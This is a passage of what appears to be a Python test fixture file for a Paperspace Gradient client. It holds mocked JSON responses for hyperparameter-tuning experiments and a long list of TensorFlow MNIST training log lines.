"workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-05-13T11:23:53.803162+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T11:23:53.803162+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45984, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "eshz1z9k37w4nm", "id": 45977, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T11:23:52.778310+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45984, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, ], "message": "success", "meta": { "filter": [], "limit": 11, "offset": 0, "totalItems": 15 } } HYPERPARAMETERS_DETAILS_RESPONSE_JSON = { "data": { "dtCreated": "2019-05-13T10:57:32.828135+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T10:57:32.828135+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45973, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "ess6t3fjs2hb1g", "id": 45966, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T10:57:31.592657+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45973, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, "message": "success" } LIST_OF_LOGS_FOR_EXPERIMENT = [ { "jobId": "jsy2ibsz1l026y", "line": 1, "timestamp": "2019-07-08T12:40:59.139Z", "message": "2019-07-08 12:40:59.139494: I tensorflow/core/platform/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA\n" }, { "jobId": "jsy2ibsz1l026y", "line": 2, "timestamp": "2019-07-08T12:40:59.271Z", "message": "2019-07-08 12:40:59.270783: I tensorflow/stream_executor/cuda/cuda_gpu_executor.cc:998] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero" }, { "jobId": "jsy2ibsz1l026y", "line": 3, "timestamp": "2019-07-08T12:40:59.271Z", "message": "2019-07-08 12:40:59.271379: I tensorflow/compiler/xla/service/service.cc:150] XLA service 0x5642a00 executing computations on platform CUDA. Devices:" }, { "jobId": "jsy2ibsz1l026y", "line": 4, "timestamp": "2019-07-08T12:40:59.271Z", "message": "2019-07-08 12:40:59.271427: I tensorflow/compiler/xla/service/service.cc:158] StreamExecutor device (0): Tesla K80, Compute Capability 3.7" }, { "jobId": "jsy2ibsz1l026y", "line": 5, "timestamp": "2019-07-08T12:40:59.274Z", "message": "2019-07-08 12:40:59.274589: I tensorflow/core/platform/profile_utils/cpu_utils.cc:94] CPU Frequency: 2200000000 Hz" }, { "jobId": "jsy2ibsz1l026y", "line": 6, "timestamp": "2019-07-08T12:40:59.275Z", "message": "2019-07-08 12:40:59.274952: I tensorflow/compiler/xla/service/service.cc:150] XLA service 0x56aba20 executing computations on platform Host. Devices:" }, { "jobId": "jsy2ibsz1l026y", "line": 7, "timestamp": "2019-07-08T12:40:59.275Z", "message": "2019-07-08 12:40:59.274983: I tensorflow/compiler/xla/service/service.cc:158] StreamExecutor device (0): \u003cundefined\u003e, \u003cundefined\u003e" }, { "jobId": "jsy2ibsz1l026y", "line": 8, "timestamp": "2019-07-08T12:40:59.275Z", "message": "2019-07-08 12:40:59.275358: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1433] Found device 0 with properties: " }, { "jobId": "jsy2ibsz1l026y", "line": 9, "timestamp": "2019-07-08T12:40:59.275Z", "message": "name: Tesla K80 major: 3 minor: 7 memoryClockRate(GHz): 0.8235" }, { "jobId": "jsy2ibsz1l026y", "line": 10, "timestamp": "2019-07-08T12:40:59.275Z", "message": "pciBusID: 0000:00:04.0" }, { "jobId": "jsy2ibsz1l026y", "line": 11, "timestamp": "2019-07-08T12:40:59.275Z", "message": "totalMemory: 11.17GiB freeMemory: 11.09GiB" }, { "jobId": "jsy2ibsz1l026y", "line": 12, "timestamp": "2019-07-08T12:40:59.275Z", "message": "2019-07-08 12:40:59.275392: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 13, "timestamp": "2019-07-08T12:40:59.276Z", "message": "2019-07-08 12:40:59.276439: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 14, "timestamp": "2019-07-08T12:40:59.276Z", "message": "2019-07-08 12:40:59.276473: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 15, "timestamp": "2019-07-08T12:40:59.276Z", "message": "2019-07-08 12:40:59.276483: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 16, "timestamp": "2019-07-08T12:40:59.276Z", "message": "2019-07-08 12:40:59.276778: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 17, "timestamp": "2019-07-08T12:40:59.28Z", "message": "WARNING: Logging before flag parsing goes to stderr." }, { "jobId": "jsy2ibsz1l026y", "line": 18, "timestamp": "2019-07-08T12:40:59.28Z", "message": "I0708 12:40:59.280403 140451862599424 mnist.py:265] ==================== Environment Variables ====================" }, { "jobId": "jsy2ibsz1l026y", "line": 19, "timestamp": "2019-07-08T12:40:59.28Z", "message": "I0708 12:40:59.280700 140451862599424 mnist.py:267] NVIDIA_VISIBLE_DEVICES: all" }, { "jobId": "jsy2ibsz1l026y", "line": 20, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.280864 140451862599424 mnist.py:267] PS_DOCKER_AGENT: 6136343261613365" }, { "jobId": "jsy2ibsz1l026y", "line": 21, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.280993 140451862599424 mnist.py:267] EVAL_SECS: 10" }, { "jobId": "jsy2ibsz1l026y", "line": 22, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281114 140451862599424 mnist.py:267] PATH: /usr/local/nvidia/bin:/usr/local/cuda/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" }, { "jobId": "jsy2ibsz1l026y", "line": 23, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281230 140451862599424 mnist.py:267] PS_HOST_PRIVATE_IP_ADDRESS: 10.138.0.15" }, { "jobId": "jsy2ibsz1l026y", "line": 24, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281354 140451862599424 mnist.py:267] PS_HOSTNAME: gradient-host-1562589161" }, { "jobId": "jsy2ibsz1l026y", "line": 25, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281510 140451862599424 mnist.py:267] HOSTNAME: 9b41cad9ccda" }, { "jobId": "jsy2ibsz1l026y", "line": 26, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281623 140451862599424 mnist.py:267] EPOCHS_EVAL: 5" }, { "jobId": "jsy2ibsz1l026y", "line": 27, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281736 140451862599424 mnist.py:267] PS_JOBSPACE: /storage" }, { "jobId": "jsy2ibsz1l026y", "line": 28, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281847 140451862599424 mnist.py:267] PS_JOB_RUNNER: 1" }, { "jobId": "jsy2ibsz1l026y", "line": 29, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.281965 140451862599424 mnist.py:267] NVIDIA_REQUIRE_CUDA: cuda\u003e=10.0 brand=tesla,driver\u003e=384,driver\u003c385 brand=tesla,driver\u003e=410,driver\u003c411" }, { "jobId": "jsy2ibsz1l026y", "line": 30, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282079 140451862599424 mnist.py:267] CUDA_PKG_VERSION: 10-0=10.0.130-1" }, { "jobId": "jsy2ibsz1l026y", "line": 31, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282189 140451862599424 mnist.py:267] LD_LIBRARY_PATH: /usr/local/cuda/extras/CUPTI/lib64:/usr/local/nvidia/lib:/usr/local/nvidia/lib64" }, { "jobId": "jsy2ibsz1l026y", "line": 32, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282299 140451862599424 mnist.py:267] TYPE: master" }, { "jobId": "jsy2ibsz1l026y", "line": 33, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282416 140451862599424 mnist.py:267] PS_DATASETS: /datasets" }, { "jobId": "jsy2ibsz1l026y", "line": 34, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282531 140451862599424 mnist.py:267] TRAIN_EPOCHS: 10" }, { "jobId": "jsy2ibsz1l026y", "line": 35, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282641 140451862599424 mnist.py:267] MAX_STEPS: 1000" }, { "jobId": "jsy2ibsz1l026y", "line": 36, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282753 140451862599424 mnist.py:267] PS_HOME: /paperspace" }, { "jobId": "jsy2ibsz1l026y", "line": 37, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.282861 140451862599424 mnist.py:267] INDEX: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 38, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.282970 140451862599424 mnist.py:267] CUDA_VERSION: 10.0.130" }, { "jobId": "jsy2ibsz1l026y", "line": 39, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283078 140451862599424 mnist.py:267] PORTS: 5000" }, { "jobId": "jsy2ibsz1l026y", "line": 40, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283186 140451862599424 mnist.py:267] PS_ARTIFACTS: /artifacts" }, { "jobId": "jsy2ibsz1l026y", "line": 41, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283293 140451862599424 mnist.py:267] NVIDIA_DRIVER_CAPABILITIES: compute,utility" }, { "jobId": "jsy2ibsz1l026y", "line": 42, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283408 140451862599424 mnist.py:267] PS_HOST_PUBLIC_IP_ADDRESS: 35.233.198.134" }, { "jobId": "jsy2ibsz1l026y", "line": 43, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283516 140451862599424 mnist.py:267] LANG: C.UTF-8" }, { "jobId": "jsy2ibsz1l026y", "line": 44, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283623 140451862599424 mnist.py:267] PS_JOB_ID: jsy2ibsz1l026y" }, { "jobId": "jsy2ibsz1l026y", "line": 45, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283730 140451862599424 mnist.py:267] HOME: /root" }, { "jobId": "jsy2ibsz1l026y", "line": 46, "timestamp": "2019-07-08T12:40:59.862Z", "message": "I0708 12:40:59.862003 140451862599424 run_config.py:532] Initializing RunConfig with distribution strategies." }, { "jobId": "jsy2ibsz1l026y", "line": 47, "timestamp": "2019-07-08T12:40:59.862Z", "message": "I0708 12:40:59.862317 140451862599424 estimator_training.py:166] Not using Distribute Coordinator." }, { "jobId": "jsy2ibsz1l026y", "line": 48, "timestamp": "2019-07-08T12:40:59.863Z", "message": "I0708 12:40:59.862842 140451862599424 estimator.py:201] Using config: {'_master': '', '_num_worker_replicas': 1, '_num_ps_replicas': 0, '_save_checkpoints_secs': None, '_log_step_count_steps': 100, '_train_distribute': \u003ctensorflow.contrib.distribute.python.one_device_strategy.OneDeviceStrategy object at 0x7fbcb5adecc0\u003e, '_protocol': None, '_session_config': allow_soft_placement: True" }, { "jobId": "jsy2ibsz1l026y", "line": 49, "timestamp": "2019-07-08T12:40:59.863Z", "message": ", '_tf_random_seed': None, '_global_id_in_cluster': 0, '_is_chief': True, '_keep_checkpoint_max': 5, '_keep_checkpoint_every_n_hours': 10000, '_model_dir': '/paperspace/models/mnist', '_save_summary_steps': 100, '_service': None, '_experimental_distribute': None, '_cluster_spec': \u003ctensorflow.python.training.server_lib.ClusterSpec object at 0x7fbcb34f7828\u003e, '_save_checkpoints_steps': 600, '_evaluation_master': '', '_eval_distribute': None, '_task_id': 0, '_distribute_coordinator_mode': None, '_task_type': 'worker', '_device_fn': None}" }, { "jobId": "jsy2ibsz1l026y", "line": 50, "timestamp": "2019-07-08T12:40:59.863Z", "message": "I0708 12:40:59.863682 140451862599424 estimator_training.py:185] Not using Distribute Coordinator." }, { "jobId": "jsy2ibsz1l026y", "line": 51, "timestamp": "2019-07-08T12:40:59.864Z", "message": "I0708 12:40:59.864074 140451862599424 training.py:610] Running training and evaluation locally (non-distributed)." }, { "jobId": "jsy2ibsz1l026y", "line": 52, "timestamp": "2019-07-08T12:40:59.864Z", "message": "I0708 12:40:59.864597 140451862599424 training.py:698] Start train and evaluate loop. The evaluate will happen after every checkpoint. Checkpoint frequency is determined based on RunConfig arguments: save_checkpoints_steps 600 or save_checkpoints_secs None." }, { "jobId": "jsy2ibsz1l026y", "line": 53, "timestamp": "2019-07-08T12:41:01.276Z", "message": "W0708 12:41:01.276278 140451862599424 deprecation.py:323] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/data/ops/dataset_ops.py:1419: colocate_with (from tensorflow.python.framework.ops) is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 54, "timestamp": "2019-07-08T12:41:01.276Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 55, "timestamp": "2019-07-08T12:41:01.276Z", "message": "Colocations handled automatically by placer." }, { "jobId": "jsy2ibsz1l026y", "line": 56, "timestamp": "2019-07-08T12:41:01.292Z", "message": "I0708 12:41:01.291953 140451862599424 estimator.py:1111] Calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 57, "timestamp": "2019-07-08T12:41:01.389Z", "message": "W0708 12:41:01.389566 140451862599424 deprecation.py:506] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/keras/layers/core.py:143: calling dropout (from tensorflow.python.ops.nn_ops) with keep_prob is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 58, "timestamp": "2019-07-08T12:41:01.389Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 59, "timestamp": "2019-07-08T12:41:01.389Z", "message": "Please use `rate` instead of `keep_prob`. Rate should be set to `rate = 1 - keep_prob`." }, { "jobId": "jsy2ibsz1l026y", "line": 60, "timestamp": "2019-07-08T12:41:01.537Z", "message": "W0708 12:41:01.536658 140451862599424 deprecation.py:323] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/ops/losses/losses_impl.py:209: to_float (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 61, "timestamp": "2019-07-08T12:41:01.537Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 62, "timestamp": "2019-07-08T12:41:01.537Z", "message": "Use tf.cast instead." }, { "jobId": "jsy2ibsz1l026y", "line": 63, "timestamp": "2019-07-08T12:41:01.86Z", "message": "I0708 12:41:01.860109 140451862599424 estimator.py:1113] Done calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 64, "timestamp": "2019-07-08T12:41:01.909Z", "message": "I0708 12:41:01.909625 140451862599424 basic_session_run_hooks.py:527] Create CheckpointSaverHook." }, { "jobId": "jsy2ibsz1l026y", "line": 65, "timestamp": "2019-07-08T12:41:02.104Z", "message": "I0708 12:41:02.104314 140451862599424 monitored_session.py:222] Graph was finalized." }, { "jobId": "jsy2ibsz1l026y", "line": 66, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105148: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 67, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105239: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 68, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105274: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 69, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105290: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 70, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105612: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 71, "timestamp": "2019-07-08T12:41:03.052Z", "message": "I0708 12:41:03.051607 140451862599424 session_manager.py:491] Running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 72, "timestamp": "2019-07-08T12:41:03.064Z", "message": "I0708 12:41:03.064292 140451862599424 session_manager.py:493] Done running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 73, "timestamp": "2019-07-08T12:41:03.405Z", "message": "I0708 12:41:03.404671 140451862599424 basic_session_run_hooks.py:594] Saving checkpoints for 0 into /paperspace/models/mnist/model.ckpt." }, { "jobId": "jsy2ibsz1l026y", "line": 74, "timestamp": "2019-07-08T12:41:03.616Z", "message": "I0708 12:41:03.616098 140451862599424 util.py:164] Initialize strategy" }, { "jobId": "jsy2ibsz1l026y", "line": 75, "timestamp": "2019-07-08T12:41:03.715Z", "message": "2019-07-08 12:41:03.715695: I tensorflow/stream_executor/dso_loader.cc:152] successfully opened CUDA library libcublas.so.10.0 locally" }, { "jobId": "jsy2ibsz1l026y", "line": 76, "timestamp": "2019-07-08T12:41:09.915Z", "message": "I0708 12:41:09.915456 140451862599424 basic_session_run_hooks.py:249] cross_entropy = 2.3025289, learning_rate = 1e-04, train_accuracy = 0.08" }, { "jobId": "jsy2ibsz1l026y", "line": 77, "timestamp": "2019-07-08T12:41:09.916Z", "message": "I0708 12:41:09.915941 140451862599424 basic_session_run_hooks.py:249] loss = 2.3025289, step = 0" }, { "jobId": "jsy2ibsz1l026y", "line": 78, "timestamp": "2019-07-08T12:41:11.313Z", "message": "I0708 12:41:11.313229 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 71.5095" }, { "jobId": "jsy2ibsz1l026y", "line": 79, "timestamp": "2019-07-08T12:41:11.314Z", "message": "I0708 12:41:11.314374 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.3830725, learning_rate = 1e-04, train_accuracy = 0.49 (1.399 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 80, "timestamp": "2019-07-08T12:41:11.314Z", "message": "I0708 12:41:11.314673 140451862599424 basic_session_run_hooks.py:247] loss = 0.3830725, step = 100 (1.399 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 81, "timestamp": "2019-07-08T12:41:12.369Z", "message": "I0708 12:41:12.368999 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 94.7225" }, { "jobId": "jsy2ibsz1l026y", "line": 82, "timestamp": "2019-07-08T12:41:12.37Z", "message": "I0708 12:41:12.370402 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.19424663, learning_rate = 1e-04, train_accuracy = 0.6433333 (1.056 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 83, "timestamp": "2019-07-08T12:41:12.371Z", "message": "I0708 12:41:12.370768 140451862599424 basic_session_run_hooks.py:247] loss = 0.19424663, step = 200 (1.056 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 84, "timestamp": "2019-07-08T12:41:13.424Z", "message": "I0708 12:41:13.423866 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 94.7932" }, { "jobId": "jsy2ibsz1l026y", "line": 85, "timestamp": "2019-07-08T12:41:13.425Z", "message": "I0708 12:41:13.425122 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.20186995, learning_rate = 1e-04, train_accuracy = 0.7125 (1.055 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 86, "timestamp": "2019-07-08T12:41:13.425Z", "message": "I0708 12:41:13.425472 140451862599424 basic_session_run_hooks.py:247] loss = 0.20186995, step = 300 (1.055 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 87, "timestamp": "2019-07-08T12:41:14.457Z", "message": "I0708 12:41:14.457170 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 96.7791" }, { "jobId": "jsy2ibsz1l026y", "line": 88, "timestamp": "2019-07-08T12:41:14.458Z", "message": "I0708 12:41:14.458280 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.14686151, learning_rate = 1e-04, train_accuracy = 0.762 (1.033 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 89, "timestamp": "2019-07-08T12:41:14.458Z", "message": "I0708 12:41:14.458536 140451862599424 basic_session_run_hooks.py:247] loss = 0.14686151, step = 400 (1.033 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 90, "timestamp": "2019-07-08T12:41:15.531Z", "message": "I0708 12:41:15.530984 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 93.1259" }, { "jobId": "jsy2ibsz1l026y", "line": 91, "timestamp": "2019-07-08T12:41:15.532Z", "message": "I0708 12:41:15.532083 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.115687564, learning_rate = 1e-04, train_accuracy = 0.795 (1.074 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 92, "timestamp": "2019-07-08T12:41:15.532Z", "message": "I0708 12:41:15.532342 140451862599424 basic_session_run_hooks.py:247] loss = 0.115687564, step = 500 (1.074 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 93, "timestamp": "2019-07-08T12:41:16.563Z", "message": "I0708 12:41:16.563513 140451862599424 basic_session_run_hooks.py:594] Saving checkpoints for 600 into /paperspace/models/mnist/model.ckpt." }, { "jobId": "jsy2ibsz1l026y", "line": 94, "timestamp": "2019-07-08T12:41:17.176Z", "message": "I0708 12:41:17.176506 140451862599424 estimator.py:1111] Calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 95, "timestamp": "2019-07-08T12:41:17.385Z", "message": "I0708 12:41:17.385438 140451862599424 estimator.py:1113] Done calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 96, "timestamp": "2019-07-08T12:41:17.41Z", "message": "I0708 12:41:17.410446 140451862599424 evaluation.py:257] Starting evaluation at 2019-07-08T12:41:17Z" }, { "jobId": "jsy2ibsz1l026y", "line": 97, "timestamp": "2019-07-08T12:41:17.517Z", "message": "I0708 12:41:17.517657 140451862599424 monitored_session.py:222] Graph was finalized." }, { "jobId": "jsy2ibsz1l026y", "line": 98, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518354: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 99, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518419: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 100, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518438: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 101, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518451: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 102, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518626: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 103, "timestamp": "2019-07-08T12:41:17.519Z", "message": "W0708 12:41:17.519085 140451862599424 deprecation.py:323] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/training/saver.py:1266: checkpoint_exists (from tensorflow.python.training.checkpoint_management) is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 104, "timestamp": "2019-07-08T12:41:17.519Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 105, "timestamp": "2019-07-08T12:41:17.519Z", "message": "Use standard file APIs to check for files with this prefix." }, { "jobId": "jsy2ibsz1l026y", "line": 106, "timestamp": "2019-07-08T12:41:17.52Z", "message": "I0708 12:41:17.520449 140451862599424 saver.py:1270] Restoring parameters from /paperspace/models/mnist/model.ckpt-600" }, { "jobId": "jsy2ibsz1l026y", "line": 107, "timestamp": "2019-07-08T12:41:17.572Z", "message": "I0708 12:41:17.572486 140451862599424 session_manager.py:491] Running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 108, "timestamp": "2019-07-08T12:41:17.584Z", "message": "I0708 12:41:17.584268 140451862599424 session_manager.py:493] Done running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 109, "timestamp": "2019-07-08T12:41:19.062Z", "message": "I0708 12:41:19.062499 140451862599424 evaluation.py:277] Finished evaluation at 2019-07-08-12:41:19" }, { "jobId": "jsy2ibsz1l026y", "line": 110, "timestamp": "2019-07-08T12:41:19.063Z", "message": "I0708 12:41:19.062822 140451862599424 estimator.py:1979] Saving dict for global step 600: accuracy = 0.9691, global_step = 600, loss = 0.10409811" }, { "jobId": "jsy2ibsz1l026y", "line": 111, "timestamp": "2019-07-08T12:41:19.113Z", "message": "I0708 12:41:19.113427 140451862599424 estimator.py:2039] Saving 'checkpoint_path' summary for global step 600: /paperspace/models/mnist/model.ckpt-600" }, { "jobId": "jsy2ibsz1l026y", "line": 112, "timestamp": "2019-07-08T12:41:19.126Z", "message": "I0708 12:41:19.125805 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 27.817" }, { "jobId": "jsy2ibsz1l026y", "line": 113, "timestamp": "2019-07-08T12:41:19.126Z", "message": "I0708 12:41:19.126667 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.108451165, learning_rate = 1e-04, train_accuracy = 0.82285714 (3.595 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 114, "timestamp": "2019-07-08T12:41:19.127Z", "message": "I0708 12:41:19.126947 140451862599424 basic_session_run_hooks.py:247] loss = 0.108451165, step = 600 (3.595 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 115, "timestamp": "2019-07-08T12:41:20.185Z", "message": "I0708 12:41:20.185327 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 94.39" }, { "jobId": "jsy2ibsz1l026y", "line": 116, "timestamp": "2019-07-08T12:41:20.186Z", "message": "I0708 12:41:20.186514 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.122035645, learning_rate = 1e-04, train_accuracy = 0.8425 (1.060 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 117, "timestamp": "2019-07-08T12:41:20.186Z", "message": "I0708 12:41:20.186774 140451862599424 basic_session_run_hooks.py:247] loss = 0.122035645, step = 700 (1.060 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 118, "timestamp": "2019-07-08T12:41:21.256Z", "message": "I0708 12:41:21.255784 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 93.4188" }, { "jobId": "jsy2ibsz1l026y", "line": 119, "timestamp": "2019-07-08T12:41:21.257Z", "message": "I0708 12:41:21.256838 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.07952806, learning_rate = 1e-04, train_accuracy = 0.8577778 (1.070 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 120, "timestamp": "2019-07-08T12:41:21.257Z", "message": "I0708 12:41:21.257101 140451862599424 basic_session_run_hooks.py:247] loss = 0.07952806, step = 800 (1.070 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 121, "timestamp": "2019-07-08T12:41:22.288Z", "message": "I0708 12:41:22.287836 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 96.8942" }, { "jobId": "jsy2ibsz1l026y", "line": 122, "timestamp": 